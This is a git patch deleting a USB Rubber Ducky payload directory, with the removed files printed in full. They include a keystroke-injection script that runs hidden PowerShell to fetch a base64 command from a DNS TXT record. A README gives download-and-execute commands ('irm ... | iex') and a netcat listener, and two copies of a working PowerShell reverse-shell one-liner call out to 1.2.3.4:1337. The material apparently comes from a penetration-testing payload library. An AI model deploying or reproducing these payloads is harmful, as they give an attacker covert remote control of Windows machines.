From c8e0ac280b73039c53a273020c95304821893d95 Mon Sep 17 00:00:00 2001
From: Nate <101878955+nathansb2022@users.noreply.github.com>
Date: Sun, 4 Aug 2024 14:29:33 -0500
Subject: [PATCH] Delete payloads/library/execution/DNS-TXT-CommandInjection
 directory

deleting and removing files from requested changes in Pull request
---
 .../DNS-TXT-CommandInjection/.gitignore       | 175 ------------------
 .../ConvertBase64.ps1                         |   3 -
 .../DNS-TXT-CommandInjection.txt              |  38 ----
 .../DNS-TXT-CommandInjection/README.md        |  49 -----
 .../execution/DNS-TXT-CommandInjection/T1.txt |   5 -
 .../powershellReverseShellOne-liner.ps1       |   5 -
 6 files changed, 275 deletions(-)
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/.gitignore
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/README.md
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
 delete mode 100644 payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1

diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/.gitignore b/payloads/library/execution/DNS-TXT-CommandInjection/.gitignore
deleted file mode 100644
index cec8300..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/.gitignore
+++ /dev/null
@@ -1,175 +0,0 @@
-# VSCode
-.vscode/*
-!.vscode/settings.json
-!.vscode/tasks.json
-!.vscode/launch.json
-!.vscode/extensions.json
-*.code-workspace
-# Local History for <a href="https://www.jcchouinard.com/python-with-vscode/">Visual Studio Code</a>
-.history/
- 
-# Common credential files
-**/credentials.json
-**/client_secrets.json
-**/client_secret.json
-*creds*
-*.dat
-*password*
-*.httr-oauth*
- 
-# Private Node Modules
-node_modules/
-creds.js
- 
-# Private Files
-*.json
-*.csv
-*.csv.gz
-*.tsv
-*.tsv.gz
-*.xlsx
- 
- 
-# Mac/OSX
-.DS_Store
- 
- 
-# Byte-compiled / optimized / DLL files
-__pycache__/
-*.py[cod]
-*$py.class
- 
-# C extensions
-*.so
- 
-# Distribution / packaging
-.Python
-build/
-develop-eggs/
-dist/
-downloads/
-eggs/
-.eggs/
-lib/
-lib64/
-parts/
-sdist/
-var/
-wheels/
-share/python-wheels/
-*.egg-info/
-.installed.cfg
-*.egg
-MANIFEST
- 
-# PyInstaller
-#  Usually these files are written by a <a href="https://www.jcchouinard.com/learn-python/">python</a> script from a template
-#  before PyInstaller builds the exe, so as to inject date/other infos into it.
-*.manifest
-*.spec
- 
-# Installer logs
-pip-log.txt
-pip-delete-this-directory.txt
- 
-# Unit test / coverage reports
-htmlcov/
-.tox/
-.nox/
-.coverage
-.coverage.*
-.cache
-nosetests.xml
-coverage.xml
-*.cover
-*.py,cover
-.hypothesis/
-.pytest_cache/
-cover/
- 
-# Translations
-*.mo
-*.pot
- 
-# Django stuff:
-*.log
-local_settings.py
-db.sqlite3
-db.sqlite3-journal
- 
-# Flask stuff:
-instance/
-.webassets-cache
- 
-# Scrapy stuff:
-.scrapy
- 
-# Sphinx documentation
-docs/_build/
- 
-# PyBuilder
-.pybuilder/
-target/
- 
-# <a href="https://www.jcchouinard.com/how-to-use-jupyter-notebook/">Jupyter Notebook</a>
-.ipynb_checkpoints
- 
-# IPython
-profile_default/
-ipython_config.py
- 
-# pyenv
-#   For a library or package, you might want to ignore these files since the code is
-#   intended to run in multiple environments; otherwise, check them in:
-# .python-version
- 
-# pipenv
-#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in <a href="https://www.jcchouinard.com/version-control/">version control.</a>
-#   However, in case of collaboration, if having platform-specific dependencies or dependencies
-#   having no cross-platform support, pipenv may install dependencies that don't work, or not
-#   install all needed dependencies.
-#Pipfile.lock
- 
-# PEP 582; used by e.g. github.com/David-OConnor/pyflow
-__pypackages__/
- 
-# Celery stuff
-celerybeat-schedule
-celerybeat.pid
- 
-# SageMath parsed files
-*.sage.py
- 
-# Environments
-.env
-.venv
-env/
-venv/
-ENV/
-env.bak/
-venv.bak/
- 
-# <a href="https://www.jcchouinard.com/python-with-spyder-ide/">Spyder</a> project settings
-.spyderproject
-.spyproject
- 
-# Rope project settings
-.ropeproject
- 
-# mkdocs documentation
-/site
- 
-# mypy
-.mypy_cache/
-.dmypy.json
-dmypy.json
- 
-# Pyre type checker
-.pyre/
- 
-# pytype static type analyzer
-.pytype/
- 
-# Cython debug symbols
-cython_debug/
-
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1 b/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
deleted file mode 100644
index ffdb8dd..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
+++ /dev/null
@@ -1,3 +0,0 @@
-$text = Read-Host -prompt "What would you like to encode"
-$base64Text = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($text))
-echo $base64Text
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt b/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
deleted file mode 100644
index e772e00..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/DNS-TXT-CommandInjection.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-REM     Title: DNS-TXT-CommandInjection
-REM     Author: Nate
-REM     Description: A usb rubber ducky payload that leverages DNS TXT records to perform command injection.
-REM     Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with
-REM     the base64 encoded payload you have. See README.md for more details on converting your payload to base64
-REM     and an example of creating your DNS TXT record in AWS Route53 service.
-REM     Target: Windows 10, 11
-REM     Props: Hak5, Darren Kitchen, Korben
-REM     Version: 1.0
-REM     Category: Execution
-
-REM     CONFIGURATION
-REM     REQUIRED A domain with the ability to manipulate the DNS TXT records.
-REM     REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a 
-REM     reverseshell.
-REM     REQUIRED A listener for incoming connections like netcat.
-REM     REQUIRED - Provide URL used for Example
-DEFINE  #MY_TARGET_URL example.com
-REM     Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-REM     Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"
-
-REM     NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
-REM     for the STRING payload below. Examples of the decoded command and encoded command are shown below to put 
-REM     into DNS TXT record.
-REM     Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
-REM     Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
-
-REM     ShoutOut: powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
-REM     https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
-REM     The link below has the Powershell script to convert your payloads to Base64.
-REM     https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1
-
-DELAY 1000 
-GUI r
-DELAY 1000
-STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-DELAY 500
-ENTER
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/README.md b/payloads/library/execution/DNS-TXT-CommandInjection/README.md
deleted file mode 100644
index ddd6110..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/README.md
+++ /dev/null
@@ -1,49 +0,0 @@
-# DNS-TXT-CommandInjection
-Ducky Script uses Resolve-DnsName to perform a DNS name query resolution for a domain hosting a malicious TXT record.
-## Description
-A usb rubber ducky payload that leverages DNS TXT records to perform command injection. Windows Powershell is the CLI used by the payload. Replace the DNS TXT record for your domain with the base64 encoded payload you have. See link below for an example of creating your DNS TXT record in AWS Route53 service.
-## Requirements
-A domain with the ability to manipulate the DNS TXT records.
-Web Server hosting the payload. In this example, python3 http.server was used to host a reverseshell.
-A listener for incoming connections like netcat.
-Provide URL used for Example
-DEFINE  #MY_TARGET_URL example.com
-
-## Notes
-No base64 can be used as an option by replacing "$a=",";powershell -e $a" with just "|iex" for the STRING payload below. Examples of the decoded command and encoded command are shown below to put into DNS TXT record.
-Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
-Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="
-powershellReverseShellOne-liner.ps1 is identical to T1.txt. (file name shortened due to character limitations)
-## Windows Commands (used in payload)
-### Execute DNS TXT Payload
-```Powershell
-powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
-```
-### Execute web hosted Powershell Reverseshell
-```Powershell
-irm http://MY_TARGET_URL/T1.txt | iex
-```
-### [Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
-```Powershell
-.\powershellReverseShellOne-liner.ps1
-```
-### Convert payload to base64
-```Powershell
-.\convertBase64.ps1
-```
-### Alternative to executing Powershell Script
-```Powershell
-gc -raw .\convertBase64.ps1 | iex
-```
-## Linux Commands
-```bash
-nc -lvnp 1337
-```
-### Links
-
-[Powershell Reverseshell One-liner](https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3)
-
-[Convert to base64](https://github.com/nathansb2022/usbrubberducky-payloads/blob/master/payloads/library/execution/DNS-TXT-CommandInjection/ConvertBase64.ps1)
-
-[Create TXT record in AWS Route53](https://www.entrust.com/knowledgebase/ssl/how-to-create-a-txt-record-on-amazon-aws-route-53-for-entrust-email-validation-method)
-
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/T1.txt b/payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
deleted file mode 100644
index f869dda..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/T1.txt
+++ /dev/null
@@ -1,5 +0,0 @@
-# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
-# CONFIGURATION
-# REQUIRED - Provide IP and Port used for Example
-# DEFINE #MY_TARGET_IP and Port after TCPClient( 
-$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
diff --git a/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1 b/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
deleted file mode 100644
index f869dda..0000000
--- a/payloads/library/execution/DNS-TXT-CommandInjection/powershellReverseShellOne-liner.ps1
+++ /dev/null
@@ -1,5 +0,0 @@
-# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
-# CONFIGURATION
-# REQUIRED - Provide IP and Port used for Example
-# DEFINE #MY_TARGET_IP and Port after TCPClient( 
-$client = New-Object System.Net.Sockets.TCPClient('1.2.3.4',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()